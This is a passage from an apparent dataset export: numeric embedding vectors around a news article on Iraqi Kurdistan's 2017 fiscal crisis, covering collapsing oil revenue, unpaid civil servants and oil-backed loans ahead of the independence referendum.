0.018015993759036064,-0.11988336592912674,0.022858737036585808,0.044236939400434494,0.007036307826638222,-0.05073552206158638,0.021059641614556313,0.10045559704303741,-0.09973584860563278,0.05854179710149765,0.04836677759885788,-0.03969810903072357,-0.024542061612010002,0.08201763778924942,-0.019584231078624725,0.048231374472379684,0.056187648326158524,0.0200307946652174,-0.05992874130606651,0.06777328997850418,-0.06802031397819519,-0.028626710176467896,0.10246527940034866,-0.04472373053431511,-0.06347783654928207,-0.05246536806225777,-0.009148132987320423,-0.03847599774599075,0.05612170323729515,-0.06778456270694733,-0.006115297321230173,0.007909062318503857,-0.004563346970826387,0.024652838706970215,-0.010068069212138653,-0.04525173455476761,0.056852493435144424,-0.0037363292649388313,0.05067466199398041,-0.055476587265729904,-0.014988795854151249,0.003113118000328541,-0.08866244554519653,0.005360497161746025,-0.0249843318015337,0.0844210684299469,0.004092642106115818,-4.5589438002480165e-8,-0.04272064194083214,-0.02328774705529213,-0.007733392529189587,0.024810174480080605,-0.07129710912704468,0.01726554147899151,-0.02034822851419449,0.014466405846178532,-0.054735615849494934,0.008476443588733673,0.06160465255379677,-0.0019989446736872196,-0.11064665764570236,-0.014327197335660458,-0.11056161671876907,0.10754944384098053,-0.09212279319763184,0.06604141741991043,0.017389096319675446,-0.025354446843266487,-0.03822372108697891,0.02067485824227333,-0.020707037299871445,-0.11025349795818329,0.03983427956700325,0.01768854632973671,0.003079179208725691,0.08127496391534805,0.03213847056031227,-0.018576551228761673,-0.09618670493364334,-0.0832926481962204,0.021465618163347244,-0.03384021669626236,-0.01548397820442915,0.041785143315792084,-0.07335616648197174,-0.0831284150481224,0.0330166295170784,-0.012667943723499775,-0.0015934488037601113,-0.056349679827690125,0.005781545769423246,-0.001182609237730503,0.0014874471817165613,-0.04039524495601654,0.021746782585978508,0.015477017499506474,0.017153676599264145,-0.01029178686439991,-0.06600378453731537,-0.08119615912437439,0.06512986123561859,-0.037832483649253845,0.04446624964475632,0.03661472350358963,-0.03173215314745903,-0.04330261051654816,0.037544798105955124,0.09134677797555923,0.004769535269588232,-0.05387396365404129,0.041314058005809784,0.0006086911307647824],"string":"[\n -0.04815385863184929,\n 0.0081796171143651,\n -0.07384995371103287,\n -0.01602235622704029,\n 0.05200835317373276,\n -0.11400347948074341,\n 0.0030773652251809835,\n 0.0035183788277208805,\n 0.053732696920633316,\n -0.01388718280941248,\n 0.024839291349053383,\n -0.05916411802172661,\n 0.009829927235841751,\n 0.05518068000674248,\n 0.08338101208209991,\n -0.00932314619421959,\n 0.01529205683618784,\n -0.006404287181794643,\n -0.002189605263993144,\n 0.001154691562987864,\n 0.05585740506649017,\n -0.08259224891662598,\n 0.02468634396791458,\n -0.0030398762319236994,\n -0.08300550282001495,\n 0.012453948147594929,\n 0.014984596520662308,\n -0.01637493073940277,\n -0.06289535760879517,\n 0.02832142636179924,\n 0.010301110334694386,\n 0.0538211315870285,\n 0.02870313823223114,\n 0.027711171656847,\n 0.05916663259267807,\n 0.0948302298784256,\n 0.08999545872211456,\n -0.06582386046648026,\n 0.051433611661195755,\n -0.025026999413967133,\n 0.030100395902991295,\n -0.05044375732541084,\n 0.0883588120341301,\n -0.05987473577260971,\n -0.007774820551276207,\n -0.06779374182224274,\n 0.11675628274679184,\n 0.027479322627186775,\n -0.0019851126708090305,\n -0.016266120597720146,\n 0.10241340845823288,\n -0.01525089144706726,\n 0.0019365192856639624,\n 0.026016628369688988,\n -0.09953124821186066,\n 0.036319758743047714,\n -0.03857443109154701,\n -0.07206594944000244,\n -0.0036821565590798855,\n -0.06617697328329086,\n 0.07007279992103577,\n 0.04417023807764053,\n -0.019154159352183342,\n 0.07136137038469315,\n 0.030421016737818718,\n 0.05327935144305229,\n 0.0323023721575737,\n 0.05695314705371857,\n -0.005405745003372431,\n -0.1197691410779953,\n 0.05464993417263031,\n -0.11003746837377548,\n -0.036794841289520264,\n 0.11782190948724747,\n 0.012580986134707928,\n -0.06875558942556381,\n 0.061540111899375916,\n 0.025748221203684807,\n -0.03506728261709213,\n -0.044920627027750015,\n 0.024407727643847466,\n -0.010198386386036873,\n 0.005710021127015352,\n -0.017431369051337242,\n -0.041438013315200806,\n 0.03309373930096626,\n -0.010515849106013775,\n 0.031279344111680984,\n 0.018414167687296867,\n 0.06125457584857941,\n 0.06398309022188187,\n 0.04827241227030754,\n -0.03592679649591446,\n -0.04932601749897003,\n 0.0115267438814044,\n -0.037461861968040466,\n 0.060466405004262924,\n 0.07007535547018051,\n -0.025630688294768333,\n 0.045986950397491455,\n 0.08140826225280762,\n 0.007243601139634848,\n 0.012339657172560692,\n -0.058450277894735336,\n 0.047696880996227264,\n 0.0642663761973381,\n -0.0360138863325119,\n 0.0013570780865848064,\n 0.038970135152339935,\n 0.09036779403686523,\n -0.10168566554784775,\n 0.01393144391477108,\n -0.037434305995702744,\n -0.025301575660705566,\n -0.03077705018222332,\n 0.08448465913534164,\n -0.035867463797330856,\n 0.01416024100035429,\n -0.03180302307009697,\n 0.05993751436471939,\n 0.032858818769454956,\n 0.004801081959158182,\n -0.004912782460451126,\n -0.09680961072444916,\n -0.06090546399354935,\n -0.017201989889144897,\n 0.0007375218556262553,\n 7.430764479158239e-34,\n -0.0739530399441719,\n 0.013655660673975945,\n 0.07711495459079742,\n -0.0036697490140795708,\n 0.04524354264140129,\n 0.027557268738746643,\n 0.008859650231897831,\n 0.049620725214481354,\n -0.06268971413373947,\n 0.02602684497833252,\n -0.06526381522417068,\n -0.07305381447076797,\n 0.04415453225374222,\n 0.046112414449453354,\n -0.016132889315485954,\n -0.0029320688918232918,\n -0.035852979868650436,\n -0.07020915299654007,\n 0.041835661977529526,\n 0.018860487267374992,\n 0.014707543887197971,\n -0.013413929380476475,\n 0.0636155903339386,\n 0.0037493447307497263,\n 0.06269121170043945,\n 0.08591149002313614,\n -0.008483469486236572,\n -0.007510318420827389,\n 0.0699029490351677,\n 0.041773125529289246,\n -0.03227398917078972,\n 0.021716265007853508,\n 0.024865353479981422,\n -0.06623712927103043,\n -0.010756619274616241,\n 0.03933224827051163,\n 0.05856770649552345,\n -0.05472484603524208,\n -0.013686755672097206,\n -0.04249342530965805,\n 0.0018614382715895772,\n -0.008603855967521667,\n -0.049452997744083405,\n 0.07468333095312119,\n 0.013019957579672337,\n 0.07445433735847473,\n 0.05335601046681404,\n -0.012577056884765625,\n 0.06522738188505173,\n 0.06688915193080902,\n 0.0077355061657726765,\n -0.021028444170951843,\n -0.12608908116817474,\n -0.03875770792365074,\n 0.018186816945672035,\n -0.09384002536535263,\n -0.049799662083387375,\n -0.008591427467763424,\n -0.0006180249038152397,\n -0.01774422451853752,\n 0.036284737288951874,\n -0.0108942287042737,\n -0.08787178248167038,\n 0.029235944151878357,\n -0.049531612545251846,\n 0.040346335619688034,\n -0.014817989431321621,\n -0.010235403664410114,\n 0.002222867915406823,\n -0.033008869737386703,\n -0.046378906816244125,\n -0.016896100714802742,\n 0.009266462177038193,\n 0.11875591427087784,\n 0.007894421927630901,\n 0.08109277486801147,\n -0.02804177813231945,\n 0.06192384287714958,\n 0.01190448459237814,\n 0.0276792049407959,\n -0.02966274879872799,\n 0.036078691482543945,\n 0.12253308296203613,\n 0.029457177966833115,\n -0.04484173655509949,\n 0.09901934862136841,\n 0.05723213776946068,\n -0.02369360439479351,\n -0.007286992855370045,\n -0.07172296941280365,\n 0.02819620817899704,\n 0.005137439351528883,\n 0.03350719437003136,\n 0.001180238206870854,\n 0.012313087470829487,\n -2.5767569017283883e-33,\n 0.008281036280095577,\n -0.13785187900066376,\n -0.0210171677172184,\n -0.050201836973428726,\n -0.02851242572069168,\n -0.01516417320817709,\n -0.0625198483467102,\n 0.025897903367877007,\n 0.020839091390371323,\n 0.009102871641516685,\n -0.013978643342852592,\n -0.06937554478645325,\n 0.11998855322599411,\n 0.017026256769895554,\n 0.08670885860919952,\n -0.013066237792372704,\n 0.04103280231356621,\n 0.030486637726426125,\n -0.00095826864708215,\n 0.06373560428619385,\n 0.0201466903090477,\n 0.0036523714661598206,\n -0.022809434682130814,\n -0.038844723254442215,\n -0.036188188940286636,\n -0.03391522541642189,\n -0.06330014020204544,\n -0.05751582607626915,\n 0.1358945071697235,\n -0.006592986639589071,\n -0.05468178540468216,\n 0.024760598316788673,\n -0.06000928208231926,\n 0.03158159554004669,\n -0.0704987421631813,\n 0.007785772439092398,\n -0.06725451350212097,\n -0.03950079530477524,\n 0.033086299896240234,\n -0.0057573444209992886,\n 0.0026201384607702494,\n -0.0029504026751965284,\n -0.07526751607656479,\n 0.012238810770213604,\n -0.09951676428318024,\n -0.054387111216783524,\n -0.05165998265147209,\n -0.0014791962457820773,\n -0.018015993759036064,\n -0.11988336592912674,\n 0.022858737036585808,\n 0.044236939400434494,\n 0.007036307826638222,\n -0.05073552206158638,\n 0.021059641614556313,\n 0.10045559704303741,\n -0.09973584860563278,\n 0.05854179710149765,\n 0.04836677759885788,\n -0.03969810903072357,\n -0.024542061612010002,\n 0.08201763778924942,\n -0.019584231078624725,\n 0.048231374472379684,\n 0.056187648326158524,\n 0.0200307946652174,\n -0.05992874130606651,\n 0.06777328997850418,\n -0.06802031397819519,\n -0.028626710176467896,\n 0.10246527940034866,\n -0.04472373053431511,\n -0.06347783654928207,\n -0.05246536806225777,\n -0.009148132987320423,\n -0.03847599774599075,\n 0.05612170323729515,\n -0.06778456270694733,\n -0.006115297321230173,\n 0.007909062318503857,\n -0.004563346970826387,\n 0.024652838706970215,\n -0.010068069212138653,\n -0.04525173455476761,\n 0.056852493435144424,\n -0.0037363292649388313,\n 0.05067466199398041,\n -0.055476587265729904,\n -0.014988795854151249,\n 0.003113118000328541,\n -0.08866244554519653,\n 0.005360497161746025,\n -0.0249843318015337,\n 0.0844210684299469,\n 0.004092642106115818,\n -4.5589438002480165e-8,\n -0.04272064194083214,\n -0.02328774705529213,\n -0.007733392529189587,\n 0.024810174480080605,\n -0.07129710912704468,\n 0.01726554147899151,\n -0.02034822851419449,\n 0.014466405846178532,\n -0.054735615849494934,\n 0.008476443588733673,\n 0.06160465255379677,\n -0.0019989446736872196,\n -0.11064665764570236,\n -0.014327197335660458,\n -0.11056161671876907,\n 0.10754944384098053,\n -0.09212279319763184,\n 0.06604141741991043,\n 0.017389096319675446,\n -0.025354446843266487,\n -0.03822372108697891,\n 0.02067485824227333,\n -0.020707037299871445,\n -0.11025349795818329,\n 0.03983427956700325,\n 0.01768854632973671,\n 0.003079179208725691,\n 0.08127496391534805,\n 0.03213847056031227,\n -0.018576551228761673,\n -0.09618670493364334,\n -0.0832926481962204,\n 0.021465618163347244,\n -0.03384021669626236,\n -0.01548397820442915,\n 0.041785143315792084,\n -0.07335616648197174,\n -0.0831284150481224,\n 0.0330166295170784,\n -0.012667943723499775,\n -0.0015934488037601113,\n -0.056349679827690125,\n 0.005781545769423246,\n -0.001182609237730503,\n 0.0014874471817165613,\n -0.04039524495601654,\n 0.021746782585978508,\n 0.015477017499506474,\n 0.017153676599264145,\n -0.01029178686439991,\n -0.06600378453731537,\n -0.08119615912437439,\n 0.06512986123561859,\n -0.037832483649253845,\n 0.04446624964475632,\n 0.03661472350358963,\n -0.03173215314745903,\n -0.04330261051654816,\n 0.037544798105955124,\n 0.09134677797555923,\n 0.004769535269588232,\n -0.05387396365404129,\n 0.041314058005809784,\n 0.0006086911307647824\n]"}}},{"rowIdx":1292,"cells":{"text":{"kind":"string","value":"A referendum on independence for Iraqi Kurdistan set for September 25 c\n\nomes as the autonomous region faces the worst economic crisis in its short history.\n\nPlunging government income, the challenge of fighting the Islamic State group and the cost of hosting hundreds of thousands of refugees have combined to punch a gaping hole in the Kurdistan Regional Government's budget.\n\n\"The KRG's coffers are empty and it's burdened with debts,\" Ruba Husari, an expert on Iraq's oil industry, told AFP.\n\nThe World Bank said in a recent report that the fiscal crisis and the security challenge posed by IS \"have had a significant adverse impact on economic growth\".\n\nThe region has benefitted from an influx of investment since the 2003 fall of dictator Saddam Hussein in a US-led invasion.\n\nIt won a measure of autonomy in the 2005 Iraqi constitution and has been seen as an island of stability in a country plunged into anarchy.\n\nIraqi Kurds take part in an event to urge people to vote in the upcoming independence referendum in Arbil, the capital of the autonomous Kurdish region of northern Iraq, on September 16, 2017 (photo by: SAFIN HAMED/AFP)\n\nThe drowsy regional capital Arbil was transformed as investors built towers, plush buildings, shopping malls and hotels to host foreign executives on business trips.\n\nAll that collapsed in 2014 as the price of oil plunged, IS jihadists seized a tranche of northern Iraq abutting the KRG and more than a million displaced Iraqis and Syrian refugees fled to the autonomous region.\n\nThat was compounded by Baghdad's decision to suspend payments to the KRG of 17 percent of Iraq's national budget.\n\nThe transfers, worth some $12 billion (10 billion euros), made up 80 percent of the region's budget revenues.\n\nWages, including those of peshmerga fighters, were slashed.\n\n\"The fiscal shock is severe,\" the World Bank said.\n\nIt said the regional government has dealt with the cut in revenues by borrowing money, postponing projects, and delaying payments -- including the salaries of government employees.\n\n'Dire economic situation'\n\nThe combination of crises slashed GDP growth from eight percent in 2013 to three percent in 2014, the World Bank said in 2015.\n\nA senior KRG official said that by the end of that year, public servants' salaries had been cut by 60 percent.\n\nA building riddled with bullet holes is seen in the mainly Kurdish Iraqi city of Kirkuk on September 18, 2017 (photo by: AHMAD AL-RUBAYE/AFP)\n\nFor the past two months, the region's 1.2 million civil servants and retirees have not been paid at all, he told AFP.\n\nFathi al-Mudaress, an adviser to the KRG, said the crisis \"stems from the fact that (the region) has made oil revenues its main source of income.\"\n\n\"Two years into the crisis, the autonomous region's government has adopted policies of austerity and income diversification, notably through tourism, agriculture and industry,\" he told AFP.\n\nKurdistan on average produces some 600,000 barrels a day, of which 550,000 are exported via Turkey.\n\nThat includes some 250,000 from the oil fields of disputed Kirkuk province, seized by Kurdish forces when IS took control of Iraq's second city Mosul.\n\nThe KRG sells oil through advance contracts, in effect taking out loans from firms including Swiss commodities giants Vitol and Glencore and repaying its debts with barrels of crude.\n\nThe KRG has used this system to borrow more than $3 billion in the past three years.\n\nRecently it borrowed $1 billion from Russia's Rosneft to pay damages to European-Emirati consortium Pearl Petroleum, which is in a dispute with the regional government.\n\nRosneft will also be paid in barrels of oil.\n\nBut with oil prices still depressed, Kurdistan has been unable to pay investors developing its fields, and its debts are growing.\n\nThe World Bank warned in 2016 that \"arrears in payments to oil companies and contractors create an uncertain business environment\".\n\nHusari said the crisis is much more severe than the Kurdistan government admits.\n\n\"The obvious 'yes' result of the referendum will not lead automatically to a declaration of an independent state but will open battles on several fronts,\" she said.\n\n\"For B arzani it's a leap forward to stay in power while diverting attention from the dire economic state of the region.\""},"embedding":{"kind":"list like","value":[0.06962639838457108,-0.03184042498469353,0.03518684208393097,0.016763534396886826,-0.02414494752883911,-0.0644831657409668,0.003034367458894849,-0.020093616098165512,0.006888996344059706,-0.018234016373753548,0.00999592337757349,0.002502854447811842,0.02287338674068451,-0.09495007246732712,-0.002235566033050418,-0.003766064066439867,-0.03147789463400841,-0.10469081997871399,-0.008590971119701862,-0.0549342967569828,-0.02690497785806656,-0.08912939578294754,0.002812814200296998,-0.038125909864902496,0.052145954221487045,-0.006339812185615301,0.0371486060321331,0.011237552389502525,-0.008695656433701515,-0.07380539923906326,0.07956378906965256,-0.06651700288057327,0.03755803406238556,-0.060345035046339035,0.06630348414182663,0.12448284775018692,0.06315287202596664,-0.022014213725924492,-0.037333160638809204,0.003327932208776474,0.06400441378355026,-0.11222678422927856,-0.053027838468551636,0.006463402882218361,-0.017328888177871704,0.03902985900640488,0.047512609511613846,-0.03596784546971321,-0.010847194120287895,-0.04208613559603691,0.08008450269699097,-0.02069307677447796,0.01302663516253233,-0.08288309723138809,0.018641987815499306,-0.06169138103723526,-0.026435794308781624,0.0090421661734581,0.04937819764018059,-0.027595514431595802,0.01640419103205204,0.06370598822832108,-0.00402040733024478,-0.020228950306773186,-0.00583798298612237,-0.044999346137046814,0.19473455846309662,-0.07114168256521225,-0.004719175398349762,-0.006106697954237461,0.07946818321943283,-0.009097571484744549,-0.043629370629787445,-0.05080484226346016,0.006548852659761906,-0.059123799204826355,0.018346458673477173,0.03614549711346626,0.05897047743201256,-0.01683281548321247,0.041043721139431,0.12077005952596664,0.009258205071091652,-0.05995155870914459,-0.011487014591693878,-0.039808716624975204,-0.020772358402609825,-0.05272974073886871,0.03898342326283455,-0.02626124769449234,-0.013973897323012352,-0.008728011511266232,0.003604380413889885,-0.019311614334583282,0.15544164180755615,-0.015572804026305676,0.12164581567049026,-0.012717198580503464,-0.009190298616886139,0.043360501527786255,0.023168737068772316,0.02394864149391651,-0.06510930508375168,-0.06472332775592804,0.02366255410015583,-0.03669670969247818,-0.04954231530427933,-0.002760200062766671,-0.023879753425717354,-0.012501761317253113,-0.07713614404201508,-0.031355809420347214,0.05598332732915878,0.014830522239208221,0.000551035103853792,-0.025153186172246933,-0.02726925164461136,-0.1280570775270462,0.04431328922510147,0.0403413362801075,-0.002341707469895482,-0.0072205401957035065,-0.07090562582015991,0.1024637296795845,0.04682616889476776,-0.05019022524356842,-0.026573598384857178,-1.3561395472108564e-33,0.005243134219199419,-0.037700071930885315,-0.03156526759266853,-0.0020097773522138596,-0.11465093493461609,-0.02852684073150158,-0.0369361974298954,0.046551816165447235,-0.1003771424293518,-0.009590759873390198,-0.02025304175913334,-0.0793662816286087,0.02573169395327568,0.027049481868743896,0.11270005255937576,-0.03971664234995842,-0.03626721352338791,0.05644034966826439,0.03438461199402809,-0.015159654431045055,-0.03190210089087486,-0.007299051620066166,-0.0019437853479757905,0.0049029020592570305,0.053641434758901596,-0.025286739692091942,-0.006468798499554396,-0.027421392500400543,0.0647410899400711,0.010497276671230793,-0.04825403913855553,-0.02272331342101097,-0.0055248308926820755,-0.013634968549013138,-0.11962085217237473,-0.02061552368104458,-0.07017534971237183,0.003844178980216384,-0.09970316290855408,0.05053596943616867,0.018169613555073738,0.03639001026749611,0.034230999648571014,-0.045420512557029724,0.0887257307767868,0.062078025192022324,0.08327978849411011,-0.08407364785671234,-0.04527514800429344,-0.04729627072811127,0.022163299843668938,0.045584551990032196,0.003377295332029462,-0.07862123847007751,-0.03605983778834343,-0.03263784945011139,-0.034345608204603195,-0.04004160687327385,-0.006020326167345047,0.03852301463484764,0.004153272602707148,0.017258072271943092,0.008922535926103592,0.0077504045329988,-0.03399176895618439,-0.008159446530044079,-0.021969107910990715,0.06927310675382614,0.00883681420236826,0.039273928850889206,-0.017194904386997223,-0.009749503806233406,0.010969276539981365,0.02537880837917328,-0.0981472060084343,0.013699322007596493,-0.009120332077145576,-0.030558910220861435,-0.04729297757148743,0.06000467762351036,0.018353363499045372,-0.022484716027975082,0.03915577381849289,-0.022221945226192474,0.015318019315600395,0.024023061618208885,0.00856479536741972,-0.05874796211719513,-0.0754871517419815,-0.06687719374895096,-0.045565467327833176,0.004361380822956562,-0.02224331721663475,-0.01599384844303131,0.036719851195812225,-1.479627157310157e-33,0.055089060217142105,-0.018809840083122253,-0.00486930925399065,-0.053435564041137695,0.020068956539034843,0.12404311448335648,0.027019048109650612,0.05581987649202347,-0.029911112040281296,0.00553365983068943,-0.026020413264632225,-0.05474366247653961,0.07848618179559708,0.04655076563358307,-0.030349554494023323,0.03366134688258171,-0.04441351443529129,-0.050404708832502365,0.005445975344628096,0.09320227801799774,-0.03234310820698738,0.027341658249497414,-0.054628610610961914,0.06313403695821762,0.021089186891913414,0.04781497269868851,-0.001699610147625208,-0.00978177785873413,-0.012654551304876804,0.026672078296542168,0.009001661092042923,-0.11551689356565475,-0.09717170149087906,0.10371756553649902,0.030389638617634773,0.023887958377599716,-0.015404724515974522,-0.09078478813171387,-0.08675737679004669,0.06040864810347557,0.05724009498953819,0.0169985331594944,0.01522202417254448,0.04081191122531891,-0.04245062544941902,0.10759823769330978,0.07672304660081863,0.014655642211437225,0.09957482665777206,-0.11043956130743027,0.034094009548425674,0.0433003231883049,-0.06598875671625137,0.09923429042100906,-0.029006803408265114,0.05081438645720482,-0.026942238211631775,0.06805173307657242,0.0018444121815264225,-0.013721374794840813,-0.08550633490085602,0.03675847873091698,0.07217781245708466,0.019666414707899094,-0.009127034805715084,-0.0331006683409214,0.012304425239562988,-0.048901431262493134,0.08185498416423798,-0.005924929864704609,0.024267612025141716,-0.035959336906671524,-0.06985785067081451,-0.05320470407605171,0.07687944918870926,0.08164070546627045,0.0635070726275444,0.05976615846157074,-0.060600828379392624,0.03730553388595581,0.04370938986539841,-0.00953506026417017,-0.055394865572452545,-0.016826575621962547,0.031843364238739014,0.06682437658309937,0.03292066231369972,0.009470393881201744,0.03145747259259224,0.05225565284490585,-0.02287544682621956,0.006426219362765551,-0.06117462366819382,0.046110473573207855,0.03088667429983616,-5.268585567819173e-8,0.07750076800584793,-0.0005739063490182161,-0.05043954774737358,0.03908427432179451,-0.05706566199660301,-0.03273345157504082,0.018911121413111687,-0.032210540026426315,-0.13757288455963135,0.04938977211713791,0.019822003319859505,0.008387511596083641,-0.08100186288356781,-0.026444721966981888,-0.03580261021852493,0.048949409276247025,-0.036134060472249985,0.06281914561986923,0.011782960966229439,-0.07417695969343185,-0.018420996144413948,-0.037361547350883484,-0.05376773700118065,0.0316009558737278,-0.0043936846777796745,0.06064845621585846,-0.001505186315625906,0.026724517345428467,0.04016575589776039,0.037064746022224426,0.04530039802193642,-0.020816612988710403,-0.08307088911533356,0.030980294570326805,0.03833948075771332,0.018443401902914047,-0.030666399747133255,0.04831267520785332,-0.0010343095054849982,-0.010692689567804337,0.023259231820702553,0.08107097446918488,0.014745532535016537,-0.008035807870328426,-0.041645631194114685,0.04754171893000603,-0.017084455117583275,-0.049059219658374786,0.05666513368487358,-0.05138162896037102,-0.01928556151688099,-0.014398178085684776,-0.005422978196293116,0.1257917881011963,0.1437857300043106,-0.06586462259292603,-0.060446321964263916,-0.08315252512693405,-0.014625020325183868,0.06709230691194534,0.029481520876288414,-0.0312560610473156,-0.021880194544792175,-0.006875323131680489],"string":"[\n 0.06962639838457108,\n -0.03184042498469353,\n 0.03518684208393097,\n 0.016763534396886826,\n -0.02414494752883911,\n -0.0644831657409668,\n 0.003034367458894849,\n -0.020093616098165512,\n 0.006888996344059706,\n -0.018234016373753548,\n 0.00999592337757349,\n 0.002502854447811842,\n 0.02287338674068451,\n -0.09495007246732712,\n -0.002235566033050418,\n -0.003766064066439867,\n -0.03147789463400841,\n -0.10469081997871399,\n -0.008590971119701862,\n -0.0549342967569828,\n -0.02690497785806656,\n -0.08912939578294754,\n 0.002812814200296998,\n -0.038125909864902496,\n 0.052145954221487045,\n -0.006339812185615301,\n 0.0371486060321331,\n 0.011237552389502525,\n -0.008695656433701515,\n -0.07380539923906326,\n 0.07956378906965256,\n -0.06651700288057327,\n 0.03755803406238556,\n -0.060345035046339035,\n 0.06630348414182663,\n 0.12448284775018692,\n 0.06315287202596664,\n -0.022014213725924492,\n -0.037333160638809204,\n 0.003327932208776474,\n 0.06400441378355026,\n -0.11222678422927856,\n -0.053027838468551636,\n 0.006463402882218361,\n -0.017328888177871704,\n 0.03902985900640488,\n 0.047512609511613846,\n -0.03596784546971321,\n -0.010847194120287895,\n -0.04208613559603691,\n 0.08008450269699097,\n -0.02069307677447796,\n 0.01302663516253233,\n -0.08288309723138809,\n 0.018641987815499306,\n -0.06169138103723526,\n -0.026435794308781624,\n 0.0090421661734581,\n 0.04937819764018059,\n -0.027595514431595802,\n 0.01640419103205204,\n 0.06370598822832108,\n -0.00402040733024478,\n -0.020228950306773186,\n -0.00583798298612237,\n -0.044999346137046814,\n 0.19473455846309662,\n -0.07114168256521225,\n -0.004719175398349762,\n -0.006106697954237461,\n 0.07946818321943283,\n -0.009097571484744549,\n -0.043629370629787445,\n -0.05080484226346016,\n 0.006548852659761906,\n -0.059123799204826355,\n 0.018346458673477173,\n 0.03614549711346626,\n 0.05897047743201256,\n -0.01683281548321247,\n 0.041043721139431,\n 0.12077005952596664,\n 0.009258205071091652,\n -0.05995155870914459,\n -0.011487014591693878,\n -0.039808716624975204,\n -0.020772358402609825,\n -0.05272974073886871,\n 0.03898342326283455,\n -0.02626124769449234,\n -0.013973897323012352,\n -0.008728011511266232,\n 0.003604380413889885,\n -0.019311614334583282,\n 0.15544164180755615,\n -0.015572804026305676,\n 0.12164581567049026,\n -0.012717198580503464,\n -0.009190298616886139,\n 0.043360501527786255,\n 0.023168737068772316,\n 0.02394864149391651,\n -0.06510930508375168,\n -0.06472332775592804,\n 0.02366255410015583,\n -0.03669670969247818,\n -0.04954231530427933,\n -0.002760200062766671,\n -0.023879753425717354,\n -0.012501761317253113,\n -0.07713614404201508,\n -0.031355809420347214,\n 0.05598332732915878,\n 0.014830522239208221,\n 0.000551035103853792,\n -0.025153186172246933,\n -0.02726925164461136,\n -0.1280570775270462,\n 0.04431328922510147,\n 0.0403413362801075,\n -0.002341707469895482,\n -0.0072205401957035065,\n -0.07090562582015991,\n 0.1024637296795845,\n 0.04682616889476776,\n -0.05019022524356842,\n -0.026573598384857178,\n -1.3561395472108564e-33,\n 0.005243134219199419,\n -0.037700071930885315,\n -0.03156526759266853,\n -0.0020097773522138596,\n -0.11465093493461609,\n -0.02852684073150158,\n -0.0369361974298954,\n 0.046551816165447235,\n -0.1003771424293518,\n -0.009590759873390198,\n -0.02025304175913334,\n -0.0793662816286087,\n 0.02573169395327568,\n 0.027049481868743896,\n 0.11270005255937576,\n -0.03971664234995842,\n -0.03626721352338791,\n 0.05644034966826439,\n 0.03438461199402809,\n -0.015159654431045055,\n -0.03190210089087486,\n -0.007299051620066166,\n -0.0019437853479757905,\n 0.0049029020592570305,\n 0.053641434758901596,\n -0.025286739692091942,\n -0.006468798499554396,\n -0.027421392500400543,\n 0.0647410899400711,\n 0.010497276671230793,\n -0.04825403913855553,\n -0.02272331342101097,\n -0.0055248308926820755,\n -0.013634968549013138,\n -0.11962085217237473,\n -0.02061552368104458,\n -0.07017534971237183,\n 0.003844178980216384,\n -0.09970316290855408,\n 0.05053596943616867,\n 0.018169613555073738,\n 0.03639001026749611,\n 0.034230999648571014,\n -0.045420512557029724,\n 0.0887257307767868,\n 0.062078025192022324,\n 0.08327978849411011,\n -0.08407364785671234,\n -0.04527514800429344,\n -0.04729627072811127,\n 0.022163299843668938,\n 0.045584551990032196,\n 0.003377295332029462,\n -0.07862123847007751,\n -0.03605983778834343,\n -0.03263784945011139,\n -0.034345608204603195,\n -0.04004160687327385,\n -0.006020326167345047,\n 0.03852301463484764,\n 0.004153272602707148,\n 0.017258072271943092,\n 0.008922535926103592,\n 0.0077504045329988,\n -0.03399176895618439,\n -0.008159446530044079,\n -0.021969107910990715,\n 0.06927310675382614,\n 0.00883681420236826,\n 0.039273928850889206,\n -0.017194904386997223,\n -0.009749503806233406,\n 0.010969276539981365,\n 0.02537880837917328,\n -0.0981472060084343,\n 0.013699322007596493,\n -0.009120332077145576,\n -0.030558910220861435,\n -0.04729297757148743,\n 0.06000467762351036,\n 0.018353363499045372,\n -0.022484716027975082,\n 0.03915577381849289,\n -0.022221945226192474,\n 0.015318019315600395,\n 0.024023061618208885,\n 0.00856479536741972,\n -0.05874796211719513,\n -0.0754871517419815,\n -0.06687719374895096,\n -0.045565467327833176,\n 0.004361380822956562,\n -0.02224331721663475,\n -0.01599384844303131,\n 0.036719851195812225,\n -1.479627157310157e-33,\n 0.055089060217142105,\n -0.018809840083122253,\n -0.00486930925399065,\n -0.053435564041137695,\n 0.020068956539034843,\n 0.12404311448335648,\n 0.027019048109650612,\n 0.05581987649202347,\n -0.029911112040281296,\n 0.00553365983068943,\n -0.026020413264632225,\n -0.05474366247653961,\n 0.07848618179559708,\n 0.04655076563358307,\n -0.030349554494023323,\n 0.03366134688258171,\n -0.04441351443529129,\n -0.050404708832502365,\n 0.005445975344628096,\n 0.09320227801799774,\n -0.03234310820698738,\n 0.027341658249497414,\n -0.054628610610961914,\n 0.06313403695821762,\n 0.021089186891913414,\n 0.04781497269868851,\n -0.001699610147625208,\n -0.00978177785873413,\n -0.012654551304876804,\n 0.026672078296542168,\n 0.009001661092042923,\n -0.11551689356565475,\n -0.09717170149087906,\n 0.10371756553649902,\n 0.030389638617634773,\n 0.023887958377599716,\n -0.015404724515974522,\n -0.09078478813171387,\n -0.08675737679004669,\n 0.06040864810347557,\n 0.05724009498953819,\n 0.0169985331594944,\n 0.01522202417254448,\n 0.04081191122531891,\n -0.04245062544941902,\n 0.10759823769330978,\n 0.07672304660081863,\n 0.014655642211437225,\n 0.09957482665777206,\n -0.11043956130743027,\n 0.034094009548425674,\n 0.0433003231883049,\n -0.06598875671625137,\n 0.09923429042100906,\n -0.029006803408265114,\n 0.05081438645720482,\n -0.026942238211631775,\n 0.06805173307657242,\n 0.0018444121815264225,\n -0.013721374794840813,\n -0.08550633490085602,\n 0.03675847873091698,\n 0.07217781245708466,\n 0.019666414707899094,\n -0.009127034805715084,\n -0.0331006683409214,\n 0.012304425239562988,\n -0.048901431262493134,\n 0.08185498416423798,\n -0.005924929864704609,\n 0.024267612025141716,\n -0.035959336906671524,\n -0.06985785067081451,\n -0.05320470407605171,\n 0.07687944918870926,\n 0.08164070546627045,\n 0.0635070726275444,\n 0.05976615846157074,\n -0.060600828379392624,\n 0.03730553388595581,\n 0.04370938986539841,\n -0.00953506026417017,\n -0.055394865572452545,\n -0.016826575621962547,\n 0.031843364238739014,\n 0.06682437658309937,\n 0.03292066231369972,\n 0.009470393881201744,\n 0.03145747259259224,\n 0.05225565284490585,\n -0.02287544682621956,\n 0.006426219362765551,\n -0.06117462366819382,\n 0.046110473573207855,\n 0.03088667429983616,\n -5.268585567819173e-8,\n 0.07750076800584793,\n -0.0005739063490182161,\n -0.05043954774737358,\n 0.03908427432179451,\n -0.05706566199660301,\n -0.03273345157504082,\n 0.018911121413111687,\n 